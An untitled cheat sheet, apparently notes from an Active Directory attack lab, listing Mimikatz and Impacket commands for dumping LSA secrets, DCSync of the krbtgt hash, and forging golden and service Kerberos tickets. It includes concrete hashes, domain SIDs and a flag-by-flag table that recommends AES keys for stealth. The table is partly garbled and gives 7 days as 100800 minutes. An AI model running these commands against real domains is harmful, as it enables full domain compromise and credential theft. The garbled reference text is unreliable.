Untitled

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' –Computername dcorp-dc
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
Invoke-Mimikatz -Command
kerberos::golden kerberos::golden
/User:Administrator Username for which the TGT is generated
/domain:dollarcorp.moneycorp.local Domain FQDN
/sid:S-1-5-21-1874506631-3219952063-
538504511 SID of the domain
/krbtgt:ff46a9d8bd66c6efd77603da26796f35 NTLM (RC4) hash of the krbtgt account. Use /aes128 and
/aes256 for using AES keys which is more silent.
/id:500 /groups:512 Optional User RID (default 500) and Group default 513 512 520
518 519)
/ptt
or
/ticket Injects the ticket in current PowerShell process - no need to
save the ticket on disk
Saves the ticket to a file for later use
/startoffset:0 Optional when the ticket is available (default 0 - right
now) in minutes. Use negative for a ticket available from
past and a larger number for future
/endin:600 Optional ticket lifetime (default is 10 years) in minutes.
The default AD setting is 10 hours = 600 minutes
/renewmax:10080 Optional ticket lifetime with renewal (default is 10 years)
in minutes. The default AD setting is 7 days = 100800
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
ticketer.py -spn MSSQLSvc/dc1.scrm.local  -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local